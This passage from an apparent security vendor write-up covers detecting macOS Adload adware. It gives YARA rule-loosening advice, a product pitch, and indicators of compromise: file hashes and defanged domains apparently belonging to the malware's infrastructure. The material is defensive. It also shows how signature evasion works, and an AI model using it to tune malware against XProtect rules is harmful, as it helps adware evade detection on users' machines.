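        print(name, classify(sample))
```

In YARA the same loosening would replace the $varName literal with a regex string such as /main\.[A-Za-z0-9_]*[Uu][Rr][Ll]/ while keeping the two import strings literal. The wider pattern buys rename resistance at the cost of some false-positive risk, so keep the Mach-O check and both imports in the condition and pair a hit with the domain extraction before acting on it.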

SentinelOne Detects Adload

These and many other Adload samples are, however, detected by SentinelOne Singularity. Our multi-engine, defense-in-depth platform uses a combination of static and dynamic engines to ensure the highest level of protection.

While we hope that Apple will quickly update its signatures to take into account this latest Adload pivot, it is inevitable that with XProtect’s YARA rules being transparent to malware developers it won’t take long for any such change to once again be circumvented.

Enterprises are advised to use a third-party security solution such as SentinelOne Singularity to ensure that devices are protected against this and other threats targeting macOS devices in the fleet.


Indicators of Compromise

File Hashes (SHA1)

13312b3dad9633fa185351e28397c21415d95125
21c447cac1c13a6804e52f216a4c41a20c963c01
5b1d60c6f461cd8ba91cbca5c7190f4b2752979d
67a56aa269b9301981c0538ace75bec2cd381656
7aaff54d2d6e3f38e51a4f084e17b9aad79a9de0
912a2ab06d3afe89e8e2ad19d3300055f0e0a968
a99d03fc3b32742de6688274a3ee3cdaef0172bf
f166eb63162ce4a5ac169e01c160be98b0e27e13
feb2c674f135410c3ced05c301f19ab461e37b20

Domains

api[.]buffermanager[.]com
api[.]deployquest[.]com
api[.]generalmodules[.]com
api[.]inetprogress[.]com
api[.]lookwebresults[.]com
api[.]navigationbuffer[.]com
api[.]operativeeng[.]com
api[.]searchwebmesh[.]com
api[.]validexplorer[.]com
